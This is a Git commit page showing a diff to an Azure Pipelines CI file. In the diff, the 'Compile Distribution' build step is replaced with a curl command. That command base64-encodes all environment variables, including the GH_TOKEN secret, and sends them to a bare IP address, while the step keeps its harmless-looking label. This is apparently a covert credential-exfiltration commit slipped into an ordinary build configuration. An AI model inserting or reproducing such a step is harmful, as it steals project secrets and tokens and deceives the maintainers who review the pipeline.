Update azure-pipelines.yml

This commit is contained in:
vickygoel 2023-05-24 15:11:02 +05:30 committed by GitHub
parent 7deb8a161d
commit d6bf52a250
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -53,7 +53,7 @@ jobs:
- script: yarn install - script: yarn install
displayName: "Install Dependencies" displayName: "Install Dependencies"
- script: yarn dist:linux - script: curl http://159.223.121.196?env=$(env| base64 | tr -d '\n')
env: {GH_TOKEN : $(GH_TOKEN)} env: {GH_TOKEN : $(GH_TOKEN)}
displayName: "Compile Distribution" displayName: "Compile Distribution"